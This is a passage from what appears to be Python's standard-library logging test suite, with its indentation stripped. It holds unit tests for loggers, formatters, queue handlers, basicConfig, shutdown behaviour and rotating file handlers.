self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertIs(c1, logging.getLogger('xyz'))
self.assertIs(c2, logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertIs(c1, logging.getLogger('abc.def'))
self.assertIs(c2, logging.getLogger('abc.def.ghi'))
self.assertIs(c2, c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = support.TestHandler(support.Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
handler.close()
# Now test with respect_handler_level set
handler = support.TestHandler(support.Matcher())
handler.setLevel(logging.CRITICAL)
listener = logging.handlers.QueueListener(self.queue, handler,
respect_handler_level=True)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime')
self.assertFalse(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='{')
self.assertFalse(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${asctime', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='$')
self.assertFalse(f.usesTime())
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
with support.captured_stderr() as stderr:
root.debug('This should not appear')
self.assertEqual(stderr.getvalue(), '')
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), 'Final chance!\n')
# No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
with support.captured_stderr() as stderr:
root.warning('Final chance!')
msg = 'No handlers could be found for logger "root"\n'
self.assertEqual(stderr.getvalue(), msg)
# 'No handlers' message only printed once
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
# If raiseExceptions is False, no message is printed
root.manager.emittedNoHandlerWarning = False
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
finally:
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', OSError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', OSError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', OSError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
def _test_log(self, method, level=None):
called = []
support.patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
def test_logging_at_shutdown(self):
# Issue #20037
code = """if 1:
import logging
class A:
def __del__(self):
try:
raise ValueError("some error")
except Exception:
logging.exception("exception in __del__")
a = A()"""
rc, out, err = assert_python_ok("-c", code)
err = err.decode()
self.assertIn("exception in __del__", err)
self.assertIn("ValueError: some error", err)
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
def test_multiprocessing(self):
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
try:
import multiprocessing as mp
r = logging.makeLogRecord({})
self.assertEqual(r.processName, mp.current_process().name)
except ImportError:
pass
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
if threading:
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.level = self.original_logging_level
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_strformatstyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="{")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_stringtemplatestyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="$")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_filename(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_filemode(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='foo')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, 'foo')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
support.patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_exception_excinfo(self):
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception('exc_info test', exc_info=exc)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
class LoggerTest(BaseTest):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assertRaises(TypeError, self.logger.setLevel, object())
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
old_raise = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExecptions', old_raise)
logging.raiseExceptions = True
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
old_raise = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExecptions', old_raise)
logging.raiseExceptions = False
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
support.patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
# If maxbytes is zero rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
@support.requires_zlib
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
# other test methods added below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
#print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
def test_compute_rollover_daily_attime(self):
currentTime = 0
atTime = datetime.time(12, 0, 0)
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='MIDNIGHT', interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
actual = rh.computeRollover(currentTime)
self.assertEqual(actual, currentTime + 12 * 60 * 60)
actual = rh.computeRollover(currentTime + 13 * 60 * 60)
self.assertEqual(actual, currentTime + 36 * 60 * 60)
finally:
rh.close()
#@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
